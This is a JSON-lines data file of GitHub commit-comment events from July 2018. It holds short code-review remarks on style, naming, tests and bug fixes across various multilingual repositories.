{"id":"7967255383","type":"CommitCommentEvent","actor":{"login":"baonguyen1997"},"repo":{"name":"baonguyen1997/baitaptuan4"},"payload":{"comment":{"id":29712639,"position":null,"line":null,"path":null,"commit_id":"e467a212cffcdd98e45da1d68f01dff3588b449c","created_at":"2018-07-15T11:58:24Z","updated_at":"2018-07-15T11:58:24Z","author_association":"OWNER","body":"bài tập tuần 4.\r\n"}},"created_at":"2018-07-15T11:58:24Z"}
{"id":"7967255656","type":"CommitCommentEvent","actor":{"login":"limorl"},"repo":{"name":"itye-msft/helm-json-plugin"},"payload":{"comment":{"id":29712640,"position":41,"line":39,"path":"Program.cs","commit_id":"82fa952010feb9c2e71dbf4ed1e21fe48453e0a8","created_at":"2018-07-15T11:58:37Z","updated_at":"2018-07-15T11:58:37Z","author_association":"COLLABORATOR","body":"Please add short comments before each funcion"}},"created_at":"2018-07-15T11:58:37Z"}
{"id":"7967256602","type":"CommitCommentEvent","actor":{"login":"limorl"},"repo":{"name":"itye-msft/helm-json-plugin"},"payload":{"comment":{"id":29712641,"position":104,"line":102,"path":"Program.cs","commit_id":"82fa952010feb9c2e71dbf4ed1e21fe48453e0a8","created_at":"2018-07-15T11:59:27Z","updated_at":"2018-07-15T11:59:27Z","author_association":"COLLABORATOR","body":"public classes in separate file"}},"created_at":"2018-07-15T11:59:27Z"}
{"id":"7967258344","type":"CommitCommentEvent","actor":{"login":"FearlessZander"},"repo":{"name":"InitialFail/driftin-bots"},"payload":{"comment":{"id":29712648,"position":null,"line":null,"path":null,"commit_id":"12bfa4aa0dd04d4634687aa8703f777bdc07725e","created_at":"2018-07-15T12:00:41Z","updated_at":"2018-07-15T12:00:41Z","author_association":"NONE","body":"Can you explain the last part to me? I tried it on chrome still only gives me 1 bot while i see other people do 15 to 20 bots. I keep getting kicked 3 but i am able to do 1 bot. Is there a way for me to do more bots? Not just one? \r\n"}},"created_at":"2018-07-15T12:00:41Z"}
{"id":"7967259255","type":"CommitCommentEvent","actor":{"login":"phpmyadmin-bot"},"repo":{"name":"vrozkovec/phpmyadmin"},"payload":{"comment":{"id":29712652,"position":null,"line":null,"path":null,"commit_id":"2528e91aa83013cf6f3e47b60dc3aef1d1eaa757","created_at":"2018-07-15T12:01:22Z","updated_at":"2018-07-15T12:01:22Z","author_association":"NONE","body":"<!-- PMABOT:SOB -->\nThis commit is missing Signed-Off-By line to indicate that you agree with phpMyAdmin Developer's Certificate of Origin. Please check [contributing documentation](https://github.com/phpmyadmin/phpmyadmin/blob/master/CONTRIBUTING.md) for more information."}},"created_at":"2018-07-15T12:01:22Z"}
{"id":"7967260578","type":"CommitCommentEvent","actor":{"login":"limorl"},"repo":{"name":"itye-msft/helm-json-plugin"},"payload":{"comment":{"id":29712653,"position":13,"line":13,"path":"ResponseParser.cs","commit_id":"82fa952010feb9c2e71dbf4ed1e21fe48453e0a8","created_at":"2018-07-15T12:02:26Z","updated_at":"2018-07-15T12:02:26Z","author_association":"COLLABORATOR","body":"What does 'handle' mean here? use more specific names that indicate what the function does."}},"created_at":"2018-07-15T12:02:26Z"}
{"id":"7967261542","type":"CommitCommentEvent","actor":{"login":"ameer-work"},"repo":{"name":"shajad-cse/tusk"},"payload":{"comment":{"id":29712655,"position":null,"line":null,"path":null,"commit_id":"d9521dc5898f5b156a5ddea9e4bea3c18d8e947b","created_at":"2018-07-15T12:03:10Z","updated_at":"2018-07-15T12:03:10Z","author_association":"CONTRIBUTOR","body":"Missed Piza adeds"}},"created_at":"2018-07-15T12:03:10Z"}
{"id":"7967262182","type":"CommitCommentEvent","actor":{"login":"limorl"},"repo":{"name":"itye-msft/helm-json-plugin"},"payload":{"comment":{"id":29712657,"position":33,"line":33,"path":"ResponseParser.cs","commit_id":"82fa952010feb9c2e71dbf4ed1e21fe48453e0a8","created_at":"2018-07-15T12:03:34Z","updated_at":"2018-07-15T12:03:34Z","author_association":"COLLABORATOR","body":"'to json format' no need for 'be'"}},"created_at":"2018-07-15T12:03:34Z"}
{"id":"7967262360","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29712658,"position":5,"line":75,"path":"lesson4/rail_road.rb","commit_id":"217232d9605a56a376c8ea0e6a340904fdc2a9be","created_at":"2018-07-15T12:03:43Z","updated_at":"2018-07-15T12:03:43Z","author_association":"NONE","body":"аналогичное замечание по всем остальным случаям слишком длинных строк\r\nв редакторе обычно по умолчанию есть серенькая полосочка обозначающая длину строки в 80 символов\r\nможно за нее немного заходить, но не стоит писать строки длинней 100\r\n\r\nвсе равно раньше или позже это надо будет исправлять, предлагаю, чтобы было легче жить начать уже с этого задания ))"}},"created_at":"2018-07-15T12:03:43Z"}
{"id":"7967265012","type":"CommitCommentEvent","actor":{"login":"Guozhengxu"},"repo":{"name":"Guozhengxu/tomorrow"},"payload":{"comment":{"id":29712660,"position":2,"line":2,"path":"app/Greeter.js","commit_id":"b78884e9536e32f6780fb9c7f2fa767824b84814","created_at":"2018-07-15T12:05:31Z","updated_at":"2018-07-15T12:05:31Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-15T12:05:31Z"}
{"id":"7967265074","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29712661,"position":19,"line":96,"path":"lesson4/rail_road.rb","commit_id":"217232d9605a56a376c8ea0e6a340904fdc2a9be","created_at":"2018-07-15T12:05:34Z","updated_at":"2018-07-15T12:05:34Z","author_association":"NONE","body":"посмотри материалы по методу `case..when` он для случая проверки значений одного и того же аргумента подходит лучше, чем `if..elsif..`\r\nэто рекомендуемый способ решения таких задач"}},"created_at":"2018-07-15T12:05:34Z"}
{"id":"7967265359","type":"CommitCommentEvent","actor":{"login":"limorl"},"repo":{"name":"itye-msft/helm-json-plugin"},"payload":{"comment":{"id":29712662,"position":77,"line":77,"path":"ResponseParser.cs","commit_id":"82fa952010feb9c2e71dbf4ed1e21fe48453e0a8","created_at":"2018-07-15T12:05:46Z","updated_at":"2018-07-15T12:05:46Z","author_association":"COLLABORATOR","body":"be consistent with style. please add spaces before and after '>'"}},"created_at":"2018-07-15T12:05:46Z"}
{"id":"7967266672","type":"CommitCommentEvent","actor":{"login":"limorl"},"repo":{"name":"itye-msft/helm-json-plugin"},"payload":{"comment":{"id":29712663,"position":105,"line":105,"path":"ResponseParser.cs","commit_id":"82fa952010feb9c2e71dbf4ed1e21fe48453e0a8","created_at":"2018-07-15T12:06:42Z","updated_at":"2018-07-15T12:06:42Z","author_association":"COLLABORATOR","body":"spaces"}},"created_at":"2018-07-15T12:06:42Z"}
{"id":"7967267909","type":"CommitCommentEvent","actor":{"login":"limorl"},"repo":{"name":"itye-msft/helm-json-plugin"},"payload":{"comment":{"id":29712664,"position":7,"line":7,"path":"ShellHelper.cs","commit_id":"82fa952010feb9c2e71dbf4ed1e21fe48453e0a8","created_at":"2018-07-15T12:07:31Z","updated_at":"2018-07-15T12:07:31Z","author_association":"COLLABORATOR","body":"if you call something ClassHelper, it usually indicates not good enough abstraction, which resulted in a generic name. "}},"created_at":"2018-07-15T12:07:31Z"}
{"id":"7967268801","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"RomanZakharenkov/homework2"},"payload":{"comment":{"id":29712665,"position":67,"line":67,"path":"src/com/itacademy/zakharenkov/task3/Task3.java","commit_id":"eae6c03c53153101369f4ebcc0aa3768b61d60a1","created_at":"2018-07-15T12:08:11Z","updated_at":"2018-07-15T12:08:11Z","author_association":"NONE","body":"код не отформатирован, использовать Ctrl + Alt + L перед коммитом"}},"created_at":"2018-07-15T12:08:11Z"}
{"id":"7967269162","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"RomanZakharenkov/homework2"},"payload":{"comment":{"id":29712666,"position":61,"line":61,"path":"src/com/itacademy/zakharenkov/task3/Task3.java","commit_id":"eae6c03c53153101369f4ebcc0aa3768b61d60a1","created_at":"2018-07-15T12:08:30Z","updated_at":"2018-07-15T12:08:30Z","author_association":"NONE","body":"сразу return number == 0; or number > 0"}},"created_at":"2018-07-15T12:08:30Z"}
{"id":"7967269176","type":"CommitCommentEvent","actor":{"login":"probonopd"},"repo":{"name":"AppImage/AppImageKit"},"payload":{"comment":{"id":29712667,"position":null,"line":null,"path":null,"commit_id":"bc339d2210fca95d95f682c5a20c0718ea199be4","created_at":"2018-07-15T12:08:31Z","updated_at":"2018-07-15T12:08:31Z","author_association":"MEMBER","body":"What happens if one runs `appimagetool` on a read-only AppDir? This still needs to work, as I use it e.g., to easily repackage existing mounted AppImages with the latest AppImage tools."}},"created_at":"2018-07-15T12:08:31Z"}
{"id":"7967270082","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"RomanZakharenkov/homework2"},"payload":{"comment":{"id":29712668,"position":77,"line":77,"path":"src/com/itacademy/zakharenkov/task1/Task1.java","commit_id":"eae6c03c53153101369f4ebcc0aa3768b61d60a1","created_at":"2018-07-15T12:09:17Z","updated_at":"2018-07-15T12:09:17Z","author_association":"NONE","body":"return (year % 4 == 0 && year % 100 != 0) || year % 400 == 0"}},"created_at":"2018-07-15T12:09:17Z"}
{"id":"7967270214","type":"CommitCommentEvent","actor":{"login":"limorl"},"repo":{"name":"itye-msft/helm-json-plugin"},"payload":{"comment":{"id":29712669,"position":2,"line":2,"path":"README.md","commit_id":"a89044dda2b507447d2d45da88960d9f0dc03a1e","created_at":"2018-07-15T12:09:23Z","updated_at":"2018-07-15T12:09:23Z","author_association":"COLLABORATOR","body":"I am missing tests for this class"}},"created_at":"2018-07-15T12:09:23Z"}
{"id":"7967271269","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"RomanZakharenkov/homework3"},"payload":{"comment":{"id":29712671,"position":17,"line":17,"path":"src/com/itacademy/zakharenkov/task1/Task1.java","commit_id":"42d5afc815983105ebc7d0ecb1cb78776c64d999","created_at":"2018-07-15T12:10:15Z","updated_at":"2018-07-15T12:10:15Z","author_association":"NONE","body":"делать отступ в одну строку между классом и функцией, а также между функциями"}},"created_at":"2018-07-15T12:10:15Z"}
{"id":"7967272840","type":"CommitCommentEvent","actor":{"login":"garth-wells"},"repo":{"name":"FEniCS/dolfinx"},"payload":{"comment":{"id":29712675,"position":4,"line":49,"path":"cpp/dolfin/io/XDMFFile.cpp","commit_id":"9690c078cfc749879c764e41b5709df1ad45f228","created_at":"2018-07-15T12:11:39Z","updated_at":"2018-07-15T12:11:39Z","author_association":"MEMBER","body":"Agree on the barriers, but let's not get hung up on the intricacies of unusual (and possibly not  to be recommended) file creation in parallel, .e.g. rapid creation and reading (should pass data via MPI), and filesystems that shouldn't really be used on quality systems, e.g. NFS, and system-dependent filesystem quirks, e.g. time for files to appear to other processes. There ample tools for users or library developers to add in wait statements, barriers, etc, for unconventional scenarios and systems."}},"created_at":"2018-07-15T12:11:39Z"}
{"id":"7967273393","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29712677,"position":null,"line":null,"path":null,"commit_id":"217232d9605a56a376c8ea0e6a340904fdc2a9be","created_at":"2018-07-15T12:12:08Z","updated_at":"2018-07-15T12:12:08Z","author_association":"NONE","body":"файл rail_road.rb \r\n\r\n- в методе `menu`: \r\n```ruby\r\n  def menu\r\n    while true\r\n```\r\nправильней вместо `while true` использовать `loop do`\r\n\r\n- далее в методах `display_stations`, `display_routes`, `display_trains` ты используешь специальную переменную для индекса - посмотри выше мой коммент по этому поводу в классе Роут\r\n\r\n- в методе `create` проблеммы с отступами... зачем то добавлен отступ для \"иф элс\" блока - он там не нужен\r\n\r\n- в методе `actions_train` лучше сразу вынести в отдельный метод вложенный услоный блок из строк 78 - 82\r\n\r\n-  в `display_info` не нужны скобки вокруг условий и во второй ветке условного блока зачем-то присваивается, но не используется переменная `station`"}},"created_at":"2018-07-15T12:12:08Z"}
{"id":"7967274629","type":"CommitCommentEvent","actor":{"login":"mikrosk"},"repo":{"name":"freemint/freemint"},"payload":{"comment":{"id":29712680,"position":null,"line":null,"path":null,"commit_id":"5fa766896bf409d00ae19f4c497f7cb36d1b0d09","created_at":"2018-07-15T12:13:13Z","updated_at":"2018-07-15T12:13:13Z","author_association":"MEMBER","body":"Shouldn't the fix then be something like `if (argc > 0 && strlen(*argv) > 0)` ?"}},"created_at":"2018-07-15T12:13:13Z"}
{"id":"7967274956","type":"CommitCommentEvent","actor":{"login":"MikeLund"},"repo":{"name":"frk1/hazedumper"},"payload":{"comment":{"id":29712682,"position":null,"line":null,"path":null,"commit_id":"59749e4e675adb44ae3af20f195c1107d3cf6b58","created_at":"2018-07-15T12:13:32Z","updated_at":"2018-07-15T12:13:32Z","author_association":"NONE","body":"@TylerBurnett sorry but you're wrong. nothing major has changed, these hooks are just out of date. dump it yourself and see."}},"created_at":"2018-07-15T12:13:32Z"}
{"id":"7967276192","type":"CommitCommentEvent","actor":{"login":"limorl"},"repo":{"name":"itye-msft/Autom8s"},"payload":{"comment":{"id":29712683,"position":1,"line":10,"path":".vscode/launch.json","commit_id":"f8fee4b2415a1d5b4b513eb075b0043166cbd355","created_at":"2018-07-15T12:14:37Z","updated_at":"2018-07-15T12:14:37Z","author_association":"COLLABORATOR","body":"the .vscode should be excluded from the repo"}},"created_at":"2018-07-15T12:14:37Z"}
{"id":"7967277058","type":"CommitCommentEvent","actor":{"login":"tommck"},"repo":{"name":"madskristensen/JavaScriptPrettier"},"payload":{"comment":{"id":29712687,"position":null,"line":null,"path":null,"commit_id":"5f490f01e8b68eb0b304e9009ca3d4da22693f31","created_at":"2018-07-15T12:15:19Z","updated_at":"2018-07-15T12:15:19Z","author_association":"CONTRIBUTOR","body":"So, I forgot to increment the versionn in the PR. \r\n\r\nShould I assume you'll do that before publishing?"}},"created_at":"2018-07-15T12:15:19Z"}
{"id":"7967277452","type":"CommitCommentEvent","actor":{"login":"BROWN-PROGRAMTECH"},"repo":{"name":"BROWN-PROGRAMTECH/python-mentorship"},"payload":{"comment":{"id":29712688,"position":null,"line":null,"path":null,"commit_id":"a2ce1d2fefaa1f532aa0c94e7ebbaf67c43fc524","created_at":"2018-07-15T12:15:40Z","updated_at":"2018-07-15T12:15:40Z","author_association":"OWNER","body":"the review"}},"created_at":"2018-07-15T12:15:40Z"}
{"id":"7967280240","type":"CommitCommentEvent","actor":{"login":"timokau"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29712694,"position":null,"line":null,"path":null,"commit_id":"af1313e91552e42a4419b396b3026319c60fc17f","created_at":"2018-07-15T12:17:56Z","updated_at":"2018-07-15T12:17:56Z","author_association":"CONTRIBUTOR","body":"See https://github.com/NixOS/nixpkgs/pull/43538 for a fix without needing ofBorg.\r\n\r\nBy the way in case you're interested in why this failed: The command expands to `filterdiff <options> -x tests/some-file-in-folder other-file-in-folder <actual patch>`\r\n\r\n`filterdiff` will than apply to `other-file-in-folder` (since it is the first argument that doesn't belong to a flag) which is probably not a patch and will be normalized to nothing."}},"created_at":"2018-07-15T12:17:56Z"}
{"id":"7967283119","type":"CommitCommentEvent","actor":{"login":"zalewskigrzegorz"},"repo":{"name":"Isur/shop"},"payload":{"comment":{"id":29712695,"position":14,"line":18,"path":"server.js","commit_id":"077c2fda65622bf5596164bd217cf4992df70d8f","created_at":"2018-07-15T12:20:21Z","updated_at":"2018-07-15T12:20:21Z","author_association":"NONE","body":"get na products leci gdziesz w kosmos :("}},"created_at":"2018-07-15T12:20:21Z"}
{"id":"7967284709","type":"CommitCommentEvent","actor":{"login":"darxriggs"},"repo":{"name":"jenkinsci/git-client-plugin"},"payload":{"comment":{"id":29712697,"position":104,"line":104,"path":"src/test/java/org/jenkinsci/plugins/gitclient/CliGitCommand.java","commit_id":"66ffe62887a1434fbb893de0a28828a943e37d3b","created_at":"2018-07-15T12:21:41Z","updated_at":"2018-07-15T12:21:41Z","author_association":"CONTRIBUTOR","body":"We should think of a better way to do this. Best is to have it repository-specific.\r\n\r\nI currently have `user.useConfigOnly = true` configured globally. This `setDefaults()` messes up my global configuration because `user.name` and `user.email` are not set.\r\n\r\nThe help for `user.useConfigOnly` reads like this:\r\n> Instruct Git to avoid trying to guess defaults for user.email and user.name, and instead retrieve the values only from the configuration. For example, if you have multiple email addresses and would like to use a different one for each repository, then with this configuration option set to true in the global config along with a name, Git will prompt you to set up an email before making new commits in a newly cloned repository. Defaults to false.\r\n"}},"created_at":"2018-07-15T12:21:41Z"}
{"id":"7967284809","type":"CommitCommentEvent","actor":{"login":"jonwingfield"},"repo":{"name":"jonwingfield/embedded-nrf24l01"},"payload":{"comment":{"id":29712698,"position":null,"line":null,"path":null,"commit_id":"b7c022f348bcd095448602bd5342f4487830e70c","created_at":"2018-07-15T12:21:47Z","updated_at":"2018-07-15T12:21:47Z","author_association":"OWNER","body":"Let me do some more testing. I have this running on a raspberry pi and a few Metro M0s but I need to clean up and make sure this is necessary.\r\n\r\nBtw, I’m impressed with the code. Nice work!"}},"created_at":"2018-07-15T12:21:47Z"}
{"id":"7967285605","type":"CommitCommentEvent","actor":{"login":"erwanp"},"repo":{"name":"radis/radis"},"payload":{"comment":{"id":29712701,"position":null,"line":null,"path":null,"commit_id":"e819db79d12f84e8ca857cd9aa30d9d074d32513","created_at":"2018-07-15T12:22:25Z","updated_at":"2018-07-15T12:22:25Z","author_association":"MEMBER","body":"done in  0fef487"}},"created_at":"2018-07-15T12:22:25Z"}
{"id":"7967294699","type":"CommitCommentEvent","actor":{"login":"xazasa"},"repo":{"name":"chubin/cheat.sh"},"payload":{"comment":{"id":29712716,"position":2,"line":2,"path":"README.md","commit_id":"4c0bd4aee38555073bdb79a0ae5db47f5850944f","created_at":"2018-07-15T12:29:53Z","updated_at":"2018-07-15T12:29:53Z","author_association":"NONE","body":"Xaviercsaunders"}},"created_at":"2018-07-15T12:29:53Z"}
{"id":"7967296549","type":"CommitCommentEvent","actor":{"login":"ArthurSargsyan"},"repo":{"name":"ArthurSargsyan/git_repo_test"},"payload":{"comment":{"id":29712723,"position":54,"line":52,"path":"Web_Project/src/controler/SearchServlet.java","commit_id":"a6d8ab9ca39106526ac38e127ab430e175fef9a6","created_at":"2018-07-15T12:31:20Z","updated_at":"2018-07-15T12:31:20Z","author_association":"OWNER","body":"Comment"}},"created_at":"2018-07-15T12:31:20Z"}
{"id":"7967296980","type":"CommitCommentEvent","actor":{"login":"ArthurSargsyan"},"repo":{"name":"ArthurSargsyan/git_repo_test"},"payload":{"comment":{"id":29712724,"position":54,"line":52,"path":"Web_Project/src/controler/SearchServlet.java","commit_id":"a6d8ab9ca39106526ac38e127ab430e175fef9a6","created_at":"2018-07-15T12:31:41Z","updated_at":"2018-07-15T12:31:41Z","author_association":"OWNER","body":"I try to do this\r\n"}},"created_at":"2018-07-15T12:31:41Z"}
{"id":"7967297841","type":"CommitCommentEvent","actor":{"login":"doofus-01"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":29712728,"position":null,"line":null,"path":null,"commit_id":"3290961db2eb00221c94f88f02f77ab640f497a4","created_at":"2018-07-15T12:32:23Z","updated_at":"2018-07-15T12:32:23Z","author_association":"MEMBER","body":"You linked to the changelog, not the release notes."}},"created_at":"2018-07-15T12:32:23Z"}
{"id":"7967298031","type":"CommitCommentEvent","actor":{"login":"caghandemir"},"repo":{"name":"TeamInfinity/android_kernel_xiaomi_msm8917-F"},"payload":{"comment":{"id":29712729,"position":null,"line":null,"path":null,"commit_id":"ba80bd0994494acf2010880920643eef5e3e67e1","created_at":"2018-07-15T12:32:33Z","updated_at":"2018-07-15T12:32:33Z","author_association":"MEMBER","body":"Dude, we don't even work on this anymore. This project is %99 dead. "}},"created_at":"2018-07-15T12:32:33Z"}
{"id":"7967298775","type":"CommitCommentEvent","actor":{"login":"SPGoding"},"repo":{"name":"ruhuasiyu/CraftingPlusPlus"},"payload":{"comment":{"id":29712730,"position":null,"line":null,"path":null,"commit_id":"4bce624c61bd040582c7db73efaf4281e02cee73","created_at":"2018-07-15T12:33:11Z","updated_at":"2018-07-15T12:33:11Z","author_association":"NONE","body":"你加入 emoji 邪教了吗"}},"created_at":"2018-07-15T12:33:11Z"}
{"id":"7967300789","type":"CommitCommentEvent","actor":{"login":"bhauman"},"repo":{"name":"smahood/figwheel-main"},"payload":{"comment":{"id":29712733,"position":null,"line":null,"path":null,"commit_id":"c473a5dfed328a53ea33b5b0b864a48e26cbfe94","created_at":"2018-07-15T12:34:53Z","updated_at":"2018-07-15T12:34:53Z","author_association":"NONE","body":"The configuration options file is generated so this naming change and jekyll headers would need to be entered in figwheel/main/schema/core.clj."}},"created_at":"2018-07-15T12:34:53Z"}
{"id":"7967301294","type":"CommitCommentEvent","actor":{"login":"HBelusca"},"repo":{"name":"Extravert-ir/reactos"},"payload":{"comment":{"id":29712734,"position":14,"line":57,"path":"boot/freeldr/freeldr/include/fs/btrfs.h","commit_id":"61d2c58640635b7786d62199ec5fdd08d6a71c3c","created_at":"2018-07-15T12:35:16Z","updated_at":"2018-07-15T12:35:16Z","author_association":"NONE","body":"Whitespace broken?"}},"created_at":"2018-07-15T12:35:16Z"}
{"id":"7967302283","type":"CommitCommentEvent","actor":{"login":"Extravert-ir"},"repo":{"name":"Extravert-ir/reactos"},"payload":{"comment":{"id":29712738,"position":774,"line":883,"path":"boot/freeldr/freeldr/lib/fs/btrfs.c","commit_id":"61d2c58640635b7786d62199ec5fdd08d6a71c3c","created_at":"2018-07-15T12:36:09Z","updated_at":"2018-07-15T12:36:09Z","author_association":"OWNER","body":"The problem is that our installer puts drivers' paths to registry in different case. I've already fixed all paths in freeldr (see next commit), registry problem is more difficult to fix"}},"created_at":"2018-07-15T12:36:09Z"}
{"id":"7967302575","type":"CommitCommentEvent","actor":{"login":"HBelusca"},"repo":{"name":"Extravert-ir/reactos"},"payload":{"comment":{"id":29712741,"position":132,"line":305,"path":"boot/freeldr/freeldr/lib/fs/btrfs.c","commit_id":"61d2c58640635b7786d62199ec5fdd08d6a71c3c","created_at":"2018-07-15T12:36:22Z","updated_at":"2018-07-15T12:36:22Z","author_association":"NONE","body":"`return (ret == 0);`"}},"created_at":"2018-07-15T12:36:22Z"}
{"id":"7967303688","type":"CommitCommentEvent","actor":{"login":"HBelusca"},"repo":{"name":"Extravert-ir/reactos"},"payload":{"comment":{"id":29712742,"position":763,"line":850,"path":"boot/freeldr/freeldr/lib/fs/btrfs.c","commit_id":"61d2c58640635b7786d62199ec5fdd08d6a71c3c","created_at":"2018-07-15T12:37:19Z","updated_at":"2018-07-15T12:37:19Z","author_association":"NONE","body":"Lol :smile: "}},"created_at":"2018-07-15T12:37:19Z"}
{"id":"7967303970","type":"CommitCommentEvent","actor":{"login":"Regulknight"},"repo":{"name":"Regulknight/IntelligentOwl"},"payload":{"comment":{"id":29712743,"position":null,"line":null,"path":null,"commit_id":"e8ab6a24d82f84eb1b0481acb57130290d5ad628","created_at":"2018-07-15T12:37:32Z","updated_at":"2018-07-15T12:37:32Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Экран просмотра команд](https://trello.com/c/1e5wKEl8/11-%D1%8D%D0%BA%D1%80%D0%B0%D0%BD-%D0%BF%D1%80%D0%BE%D1%81%D0%BC%D0%BE%D1%82%D1%80%D0%B0-%D0%BA%D0%BE%D0%BC%D0%B0%D0%BD%D0%B4)"}},"created_at":"2018-07-15T12:37:32Z"}
{"id":"7967304575","type":"CommitCommentEvent","actor":{"login":"Regulknight"},"repo":{"name":"Regulknight/IntelligentOwl"},"payload":{"comment":{"id":29712744,"position":null,"line":null,"path":null,"commit_id":"e27d1c11a32f3924119071fcb2fccedf0cea6c57","created_at":"2018-07-15T12:37:59Z","updated_at":"2018-07-15T12:37:59Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Navigation bar(Будет перерабатываться, но он уже красивый и уже есть)](https://trello.com/c/7ZoZ0mcI/10-navigation-bar%D0%B1%D1%83%D0%B4%D0%B5%D1%82-%D0%BF%D0%B5%D1%80%D0%B5%D1%80%D0%B0%D0%B1%D0%B0%D1%82%D1%8B%D0%B2%D0%B0%D1%82%D1%8C%D1%81%D1%8F-%D0%BD%D0%BE-%D0%BE%D0%BD-%D1%83%D0%B6%D0%B5-%D0%BA%D1%80%D0%B0%D1%81%D0%B8%D0%B2%D1%8B%D0%B9-%D0%B8-%D1%83%D0%B6%D0%B5-%D0%B5%D1%81%D1%82%D1%8C)"}},"created_at":"2018-07-15T12:37:59Z"}
{"id":"7967304598","type":"CommitCommentEvent","actor":{"login":"studious"},"repo":{"name":"jsiebern/bs-material-ui"},"payload":{"comment":{"id":29712745,"position":38,"line":38,"path":"copyPlatformBinaryInPlace.js","commit_id":"5d5f169b1df46f3ba009197ccdac83bc848fa98f","created_at":"2018-07-15T12:38:00Z","updated_at":"2018-07-15T12:38:00Z","author_association":"NONE","body":"Should this be `ppx_withStyles`?"}},"created_at":"2018-07-15T12:38:00Z"}
{"id":"7967304948","type":"CommitCommentEvent","actor":{"login":"Regulknight"},"repo":{"name":"Regulknight/IntelligentOwl"},"payload":{"comment":{"id":29712746,"position":null,"line":null,"path":null,"commit_id":"257d80367a7874e4e27b2c8447f94bbf28b76770","created_at":"2018-07-15T12:38:18Z","updated_at":"2018-07-15T12:38:18Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Экран создания и редактирования команды](https://trello.com/c/OJq3dISf/1-%D1%8D%D0%BA%D1%80%D0%B0%D0%BD-%D1%81%D0%BE%D0%B7%D0%B4%D0%B0%D0%BD%D0%B8%D1%8F-%D0%B8-%D1%80%D0%B5%D0%B4%D0%B0%D0%BA%D1%82%D0%B8%D1%80%D0%BE%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F-%D0%BA%D0%BE%D0%BC%D0%B0%D0%BD%D0%B4%D1%8B)"}},"created_at":"2018-07-15T12:38:18Z"}
{"id":"7967305022","type":"CommitCommentEvent","actor":{"login":"bhauman"},"repo":{"name":"smahood/figwheel-main"},"payload":{"comment":{"id":29712747,"position":null,"line":null,"path":null,"commit_id":"c473a5dfed328a53ea33b5b0b864a48e26cbfe94","created_at":"2018-07-15T12:38:21Z","updated_at":"2018-07-15T12:38:21Z","author_association":"NONE","body":"Also I'm trying to make the documentation flow like a book  (I'm thinking I'll add next and previous links)  and elevate some of the reference documents (like configuration and cli reference) to a top level, or perhaps we can place them at the end like an appendix?"}},"created_at":"2018-07-15T12:38:21Z"}
{"id":"7967306083","type":"CommitCommentEvent","actor":{"login":"HBelusca"},"repo":{"name":"Extravert-ir/reactos"},"payload":{"comment":{"id":29712751,"position":5,"line":491,"path":"boot/freeldr/freeldr/ntldr/winldr.c","commit_id":"f77f21708073241d51145de4a9fd6594a8fb04ee","created_at":"2018-07-15T12:39:16Z","updated_at":"2018-07-15T12:39:16Z","author_association":"NONE","body":"Is this done because the files are created in lowercase on disk?\r\n\r\nTo be more specific, the truly NT-compatible way is to put everything in **upper-case**."}},"created_at":"2018-07-15T12:39:16Z"}
{"id":"7967306546","type":"CommitCommentEvent","actor":{"login":"kaushikcfd"},"repo":{"name":"kaushikcfd/PyOP2"},"payload":{"comment":{"id":29712752,"position":8,"line":556,"path":"pyop2/codegen/rep2loopy.py","commit_id":"5c3d4ded05edcf8ce2faf2bd799a3b344647c47b","created_at":"2018-07-15T12:39:40Z","updated_at":"2018-07-15T12:39:40Z","author_association":"OWNER","body":"That's an old commit. I have removed it in the newer commit: 921d4f6c84309989d7c5813f25c1f5c2b70a1c39 ."}},"created_at":"2018-07-15T12:39:40Z"}
{"id":"7967307351","type":"CommitCommentEvent","actor":{"login":"zeroa11"},"repo":{"name":"zeroa11/p1"},"payload":{"comment":{"id":29712753,"position":null,"line":null,"path":null,"commit_id":"5297ecfbcee5d960a90e31ac3d9f1ed370133596","created_at":"2018-07-15T12:40:17Z","updated_at":"2018-07-15T12:40:17Z","author_association":"OWNER","body":"1"}},"created_at":"2018-07-15T12:40:17Z"}
{"id":"7967309123","type":"CommitCommentEvent","actor":{"login":"Extravert-ir"},"repo":{"name":"Extravert-ir/reactos"},"payload":{"comment":{"id":29712755,"position":5,"line":491,"path":"boot/freeldr/freeldr/ntldr/winldr.c","commit_id":"f77f21708073241d51145de4a9fd6594a8fb04ee","created_at":"2018-07-15T12:41:36Z","updated_at":"2018-07-15T12:41:36Z","author_association":"OWNER","body":"Yes, these files and folders are written in lower-case to disk"}},"created_at":"2018-07-15T12:41:36Z"}
{"id":"7967309978","type":"CommitCommentEvent","actor":{"login":"Extravert-ir"},"repo":{"name":"Extravert-ir/reactos"},"payload":{"comment":{"id":29712756,"position":5,"line":491,"path":"boot/freeldr/freeldr/ntldr/winldr.c","commit_id":"f77f21708073241d51145de4a9fd6594a8fb04ee","created_at":"2018-07-15T12:42:16Z","updated_at":"2018-07-15T12:42:16Z","author_association":"OWNER","body":"There is another way to fix this - make symlinks"}},"created_at":"2018-07-15T12:42:16Z"}
{"id":"7967312698","type":"CommitCommentEvent","actor":{"login":"bevzuk"},"repo":{"name":"dodopizza/restaurantboard-public"},"payload":{"comment":{"id":29712761,"position":null,"line":null,"path":null,"commit_id":"8d10b1acddbcaafba8bdb1f833c2973c4f19b346","created_at":"2018-07-15T12:44:17Z","updated_at":"2018-07-15T12:44:17Z","author_association":"MEMBER","body":"2 теста падают"}},"created_at":"2018-07-15T12:44:17Z"}
